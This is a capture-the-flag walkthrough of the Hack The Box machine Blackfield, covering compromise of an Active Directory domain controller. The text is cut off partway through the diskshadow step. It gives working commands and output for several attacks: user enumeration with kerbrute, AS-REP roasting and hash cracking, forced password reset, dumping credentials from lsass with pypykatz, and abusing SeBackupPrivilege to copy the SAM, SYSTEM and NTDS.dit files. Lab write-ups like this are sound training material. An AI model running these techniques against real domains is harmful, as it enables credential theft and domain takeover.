> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-blackfield.md).

# HTB - Blackfield

Hard · Windows · VIP

## NMAP

```bash
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-04 05:23:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local, Site: Default-First-Site-Name)                                                                                                              
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                                                                        
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows 
```

### DNS

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTuSTysOL0T8cxL6uFUF7%2Fimage.png?alt=media&amp;token=63c45410-ea53-43a9-8085-d928a8de64d8" alt=""><figcaption></figcaption></figure>

### LDAP

No anonymous LDAP Bind

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2qGVIKO3F7aNGAfe1iB1%2Fimage.png?alt=media&amp;token=a07a602d-534a-485c-98a7-1d65f5957d76" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ ldapsearch -H ldap://10.129.229.17 -x -b "" -s base "(objectClass=*)"
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=BLACKFIELD,DC=local
ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=lo
 cal
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=BLACKFIELD,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=BLACKFIELD,DC=local
namingContexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingContexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local
isSynchronized: TRUE
highestCommittedUSN: 237657
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local
dnsHostName: DC01.BLACKFIELD.local
defaultNamingContext: DC=BLACKFIELD,DC=local
currentTime: 20260604053517.0Z
configurationNamingContext: CN=Configuration,DC=BLACKFIELD,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ 

```

The server does allow an unauthenticated base query.

* Domain Name: `BLACKFIELD.local`
* Domain Controller Hostname: `DC01.BLACKFIELD.local`
* Distinguished Name (DN) structure: `DC=BLACKFIELD,DC=local`
* Operating Status: The server is running and synchronized, confirming it is an active Domain Controller.

### SMB

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHH8s6v08czyUM04ORiXy%2Fimage.png?alt=media&amp;token=3ae4ef2a-6a8b-4bc1-81d1-9cf0d363c7ee" alt=""><figcaption></figcaption></figure>

Has Anonymous and Guest access enabled.

Cant list shares anonymously but can do it with guest access. Forensic is a non standard share but we dont have READ access to it.

Accessing the profile$ share revealed a list of directories each named after user. Extract the possible usernames and save it the file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhslRPusSmtY7D99rm8l7%2Fimage.png?alt=media&amp;token=71cd8397-6c18-42db-91b9-b610882d8805" alt=""><figcaption></figcaption></figure>

There are 314 usernames in the profile$ share.

```bash
┌──(ajay㉿kali)-[~]
└─$ awk '{print $1}' ~/use.txt > usernames.txt
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlyivkMddOEXxowRrmJZN%2Fimage.png?alt=media&amp;token=82ee6d03-4fff-4feb-8d93-1d5985330c68" alt=""><figcaption></figcaption></figure>

Next using kerbrute we can validate the users by providing the usernames.txt file.

#### Validating usernames using Kerbrute

```bash
──(ajay㉿kali)-[~/Tools]
└─$ ./kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.129.229.17 ~/usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/03/26 - Ronnie Flathers @ropnop

2026/06/03 18:47:00 >  Using KDC(s):
2026/06/03 18:47:00 >   10.129.229.17:88

2026/06/03 18:47:20 >  [+] VALID USERNAME:       audit2020@blackfield.local
2026/06/03 18:49:13 >  [+] VALID USERNAME:       support@blackfield.local
2026/06/03 18:49:17 >  [+] VALID USERNAME:       svc_backup@blackfield.local
2026/06/03 18:49:43 >  Done! Tested 314 usernames (3 valid) in 163.079 seconds
```

I dont have credentials yet. the possible next step would be to do Asreproasting where we need to identify which of those accounts have the "Do not require Kerberos pre-authentication" attribute set.

### Asreproasting

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -usersfile valid_username.txt -format hashcat  -dc-ip 10.129.229.17
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[-] User audit2020@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@blackfield.local@BLACKFIELD.LOCAL:3e892fade06ca1d2022bf25b1316c8e7$27e10e26faf992daf8f4df2e1298bbfc91e30ddb9764ebc7a625c506ea83feb89f02792a63d5070620b7dc96c0b89b6e41a4651e72624dadf8db02c5654b14ee5f575132616e7e1dd6165947eecb71577939243a715eb9767e29060461f45c4d0e693d11fc6987e23541fb088327316db67bddbf02738613fe692e4095ed42d074129f96fa28ce5a4fd0944cb8ab567f40935b00116549ea833e9366645853d485b52d3e9ab76ac634a60b921f6d88651ae7b0ea68b37dd0bc0ebd74139d26f9b13bc4009fb9a216d393b65da09ad456808edf36c96bd1699dfdec1e1e4b6e7ad3b187674d996b68c310bef6b64d2b4d28d78c23
[-] User svc_backup@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                              
```

We can crack the hash using hashcat or John The Ripper.

```bash
──(ajay㉿kali)-[~]
└─$ echo '$krb5asrep$23$support@blackfield.local@BLACKFIELD.LOCAL:3e892fade06ca1d2022bf25b1316c8e7$27e10e26faf992daf8f4df2e1298bbfc91e30ddb9764ebc7a625c506ea83feb89f02792a63d5070620b7dc96c0b89b6e41a4651e72624dadf8db02c5654b14ee5f575132616e7e1dd6165947eecb71577939243a715eb9767e29060461f45c4d0e693d11fc6987e23541fb088327316db67bddbf02738613fe692e4095ed42d074129f96fa28ce5a4fd0944cb8ab567f40935b00116549ea833e9366645853d485b52d3e9ab76ac634a60b921f6d88651ae7b0ea68b37dd0bc0ebd74139d26f9b13bc4009fb9a216d393b65da09ad456808edf36c96bd1699dfdec1e1e4b6e7ad3b187674d996b68c310bef6b64d2b4d28d78c23' > support.hash
```

```bash
hashcat -m 18200 support.hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$support@blackfield.local@BLACKFIELD.LOCAL:3e892fade06ca1d2022bf25b1316c8e7$27e10e26faf992daf8f4df2e1298bbfc91e30ddb9764ebc7a625c506ea83feb89f02792a63d5070620b7dc96c0b89b6e41a4651e72624dadf8db02c5654b14ee5f575132616e7e1dd6165947eecb71577939243a715eb9767e29060461f45c4d0e693d11fc6987e23541fb088327316db67bddbf02738613fe692e4095ed42d074129f96fa28ce5a4fd0944cb8ab567f40935b00116549ea833e9366645853d485b52d3e9ab76ac634a60b921f6d88651ae7b0ea68b37dd0bc0ebd74139d26f9b13bc4009fb9a216d393b65da09ad456808edf36c96bd1699dfdec1e1e4b6e7ad3b187674d996b68c310bef6b64d2b4d28d78c23:#00^BlackKnight

```

We got the following credentials

`support : #00^BlackKnight`

We dont know what privileges the support user have so inorder to get clear picture we can collect bloodhound data as support and analyze clearerly.

## Bloodhound

```bash
┌──(ajay㉿kali)-[~]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local  -ns 10.129.229.17  -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Testing resolved hostname connectivity dead:beef::1563:d3fb:e4d6:80c8
INFO: Trying LDAP connection to dead:beef::1563:d3fb:e4d6:80c8
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Testing resolved hostname connectivity dead:beef::1563:d3fb:e4d6:80c8
INFO: Trying LDAP connection to dead:beef::1563:d3fb:e4d6:80c8
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 21S

```

Uplaod the data to bloodhound-cli and analyze furthur.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCQB6KV3dAKeLgNv0fbcd%2Fimage.png?alt=media&amp;token=835a4a9c-b063-4230-bcb9-7f5f2e96589a" alt=""><figcaption></figcaption></figure>

We can get remote access as support cause he is not part of Remote Management Users.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FICEPdV6V0AMUBmvAb7mq%2Fimage.png?alt=media&amp;token=9e12a728-85a5-41c3-bb7a-118c5163b963" alt=""><figcaption></figcaption></figure>

Support has ForceChangePassword on Audit2020.

### Abusing ForceChangePassword.

With this privilege we can change the target user password.

```bash
┌──(ajay㉿kali)-[~]
└─$ net rpc password 'AUDIT2020' 'NewPassword123!' -U 'BLACKFIELD/support%#00^BlackKnight' -S 10.129.229.17
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb blackfield.local -u AUDIT2020 -p 'NewPassword123!'                                             
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\AUDIT2020:NewPassword123!
```

Next mark the user as owned in bloodhound and enumerate further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQzWlRFyKE7hzcuiSbJZQ%2Fimage.png?alt=media&amp;token=2ca84688-279d-495d-95fe-57af81da16c9" alt=""><figcaption></figcaption></figure>

AUDIT2020 has no furthur permissions to exploit but we saw a share forensic. we can try to see if support or audit2020 has access to read it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fmpja2OO71vBcR8QJQyJG%2Fimage.png?alt=media&amp;token=8df2c909-6f47-4654-822e-09feb017ab39" alt=""><figcaption></figcaption></figure>

Audit2020 has access to forensic.

### Accessing share using AUDIT2020

```bash
──(ajay㉿kali)-[~]
└─$ smbclient //10.129.229.17/forensic -U 'AUDIT2020%NewPassword123!'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                5102079 blocks of size 4096. 1693772 blocks available
smb: \> 

```

There are interesting directories in the shares.

```bash
──(ajay㉿kali)-[~]
└─$ smbclient //10.129.229.17/forensic -U 'AUDIT2020%NewPassword123!'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                5102079 blocks of size 4096. 1693772 blocks available
smb: \> cd commands_output\
smb: \commands_output\> dir
  .                                   D        0  Sun Feb 23 13:14:37 2020
  ..                                  D        0  Sun Feb 23 13:14:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 08:00:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 07:51:52 2020
  domain_users.txt                    A    16454  Fri Feb 28 17:32:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 07:53:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 07:50:28 2020
  netstat.txt                         A     3842  Sun Feb 23 07:51:01 2020
  route.txt                           A     3976  Sun Feb 23 07:53:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 07:56:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 07:54:29 2020

                5102079 blocks of size 4096. 1694475 blocks available
smb: \commands_output\> cd ..
smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
  .                                   D        0  Thu May 28 16:28:33 2020
  ..                                  D        0  Thu May 28 16:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 16:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 16:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 16:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 16:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 16:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 16:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 16:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 16:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 16:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 16:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 16:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 16:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 16:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 16:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 16:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 16:27:53 2020

                5102079 blocks of size 4096. 1694475 blocks available
smb: \memory_analysis\> cd ..
smb: \> cd Tools
smb: \Tools\> ls
  .                                   D        0  Sun Feb 23 08:39:08 2020
  ..                                  D        0  Sun Feb 23 08:39:08 2020
  sleuthkit-4.8.0-win32               D        0  Sun Feb 23 08:39:03 2020
  sysinternals                        D        0  Sun Feb 23 08:35:25 2020
  volatility                          D        0  Sun Feb 23 08:35:39 2020

                5102079 blocks of size 4096. 1694475 blocks available
smb: \Tools\> 

```

As part of enumerating each file, it would be better to mount the share locally and work on it.

#### Mounting the Share locally

```bash
(ajay㉿kali)-[~]
└─$ sudo mkdir /mnt/forensic_share 

──(ajay㉿kali)-[~]
└─$ sudo mount -t cifs //10.129.229.17/forensic /mnt/forensic_share -o 'username=AUDIT2020,password=NewPassword123!,domain=BLACKFIELD.local'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgdIEomhhKj1RH82y1Cxp%2Fimage.png?alt=media&amp;token=1926d0aa-8b9c-4422-9740-d98fabc63b40" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlbLvIMO1Pkzu84L50cRD%2Fimage.png?alt=media&amp;token=5350b9eb-c8f2-4408-b17d-1efae0f0d7be" alt=""><figcaption></figcaption></figure>

There is a lsass.zip file in the memory\_analysis directory. Extract the file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ftw46rszsCuAaEYK6TmON%2Fimage.png?alt=media&amp;token=26dbb9da-36cb-419f-b83e-274c4dfccad5" alt=""><figcaption></figcaption></figure>

The lsass.DMP file is a memory dump of the Local Security Authority Subsystem Service, which is a prime target for extracting credentials from a Windows system.

You can now use `pypykatz`, a pure Python implementation of Mimikatz, to parse this file and attempt to extract cleartext passwords, NTLM hashes, or Kerberos tickets.

### Pypykatz to dump lsass.dmp

```bash
┌──(ajay㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
                AES128 Key: 9658d1d1dcd9250115e2205d9f48400d
                AES256 Key: 20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)


<SNIP> ....
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a8955000000000
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: Administrator
                Domain: BLACKFIELD.LOCAL
                AES128 Key: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                AES256 Key: ec841e1e29ad7d6332a243b6b4ab445839829244408269850ab7c78a2cf45615
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == DPAPI [25869]==
                luid 153705
                key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
                masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
                sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9


                DPAPI: 0000000000000000000000000000000000000000
        == WDIGEST [5eda]==
                username DC01$
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: DC01$
                Domain: BLACKFIELD.local
                Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
                password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
                AES128 Key: b624dc83a27cc29da11d9bf25efea796
                AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44
        == WDIGEST [5eda]==
                username DC01$
                domainname BLACKFIELD
                password None
                password (hex)
<SNIP>

```

* Administrator (User):
  * NTLM Hash: `7f1e4ff8c6a8e6b6fcae2d9c0572cd62`
  * AES256 Key: `ec841e1e29ad7d6332a243b6b4ab445839829244408269850ab7c78a2cf45615`
* svc\_backup (Service Account):

  * NTLM Hash: `9658d1d1dcd9250115e2205d9f48400d`
  * AES256 Key: `20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91`

  There are many login sessions but the above two are important.

The Administrator hash do not work but svc\_backup works.

## Shell as SVC\_BACKUP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYYaZJJzs4V2ORZeOfogA%2Fimage.png?alt=media&amp;token=983cec2f-8eb4-4333-9f84-2367cac832d2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2aXUgchwRx92YhkK7pLG%2Fimage.png?alt=media&amp;token=a6e26808-01e1-477d-8e73-3db5b2d0dcbf" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMSsNrWuY6fHu3wTcEGe3%2Fimage.png?alt=media&amp;token=ba0e28e6-a2d8-4069-bfb8-0d9e752379d5" alt=""><figcaption></figcaption></figure>

`SVC_BACKUP` possesses critical privileges, specifically `SeBackupPrivilege` and `SeRestorePrivilege`.

**SeBackupPrivilege/SeRestorePrivilege**: These allow an attacker to read or write any file on the system, regardless of DACLs. Typically, this is used to extract the NTDS.dit file (Active Directory database) and the SYSTEM registry hive to perform offline password cracking of all domain accounts, including the Domain Admin.

### Abusing SeBackup Privilege

#### Getting SAM and SYSTEM

```powershell
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> mkdir C:\temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         6/4/2026  12:01 AM                temp


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> reg save HKLM\SAM C:\temp\SAM
The operation completed successfully.

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> reg save HKLM\SYSTEM C:\temp\SYSTEM
The operation completed successfully.

*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2026  12:01 AM          45056 SAM
-a----         6/4/2026  12:01 AM       17596416 SYSTEM


```

#### Getting NTDS.dit

NTDS.dit is a **live database file** that is locked by the NTDS service, so we cannot copy it directly. Instead we create a VSS shadow copy of the disk, which gives us an unlocked snapshot, then use SeBackupPrivilege to bypass ACL restrictions and copy it to our machine to dump hashes

**Step 1 : Create a file with commands**

`set context persistent nowriters`Creates a shadow copy excluding VSS writers (avoids locks)

`add volume c: alias pwn`Targets the C: drive and names the shadow copy

&#x20;`pwncreate`Actually creates the shadow copy snapshot

`expose %pwn% z:`Mounts the snapshot as drive `Z:\`

```bash
──(ajay㉿kali)-[~]
└─$ cat > shadow.txt << 'EOF'
set context persistent nowriters
add volume c: alias pwn
create
expose %pwn% z:
EOF
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ unix2dos shadow.txt
unix2dos: converting file shadow.txt to DOS format...
```

**Step 2 : Upload through winrm shell**

```powerquery
*Evil-WinRM* PS C:\temp> upload shadow.txt
                                        
Info: Uploading /home/ajay/shadow.txt to C:\temp\shadow.txt
                                        
Data: 112 bytes of 112 bytes copied
                                        
Info: Upload successful!

```

**Step 3 : run the diskshadow\.exe**&#x20;

This creates a **VSS snapshot** of the entire C: drive and mounts it as `Z:\`. The snapshot is a frozen copy of the disk — meaning `ntds.dit` is **not locked** on the shadow copy, unlike the live version.

```powershell
*Evil-WinRM* PS C:\temp> diskshadow.exe /s C:\temp\shadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/4/2026 12:16:38 AM

-> set context persistent nowriters
-> add volume c: alias pwn
-> create
Alias pwn for shadow ID {e8ba1acb-a843-466a-bcf6-e1688e333fba} set as environment variable.
